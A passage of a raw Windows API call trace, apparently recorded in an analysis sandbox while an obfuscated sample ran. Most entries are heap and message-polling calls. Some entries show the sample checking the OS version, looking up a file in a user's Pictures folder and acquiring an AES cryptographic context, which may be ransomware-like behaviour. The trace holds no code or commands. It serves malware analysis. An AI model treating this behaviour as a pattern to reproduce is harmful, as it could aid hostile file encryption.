HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0211.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0211.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0211.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.786] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/W9bUf5L8kEVKE-hdQ.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb19ceef0, ftCreationTime.dwHighDateTime=0x1d5d782, ftLastAccessTime.dwLowDateTime=0x38c01930, ftLastAccessTime.dwHighDateTime=0x1d5d214, ftLastWriteTime.dwLowDateTime=0x38c01930, ftLastWriteTime.dwHighDateTime=0x1d5d214, nFileSizeHigh=0x0, nFileSizeLow=0x110e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="W9bUf5L8kEVKE-hdQ.png", cAlternateFileName="W9BUF5~1.PNG")) returned 0x9e1bf8 [0211.786] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0211.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0211.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.787] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0211.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0211.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0211.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0211.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0211.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0211.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.788] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.788] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.788] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.788] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.788] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0211.788] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.788] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0211.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.788] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.789] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.789] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0211.789] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.789] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.790] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.790] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.790] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.790] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.790] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.791] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0211.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0211.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0211.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.791] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0211.791] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0211.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.791] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.791] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.791] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.791] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.791] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0211.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0211.791] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.791] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.792] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.792] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.792] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.792] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0211.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0211.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7180, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0211.792] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c990) returned 1 [0211.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.794] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0211.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.794] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0211.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.794] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.794] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.794] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.794] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.794] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.795] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0211.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.795] CharUpperBuffW (in: lpsz="SSA2E00304E40", 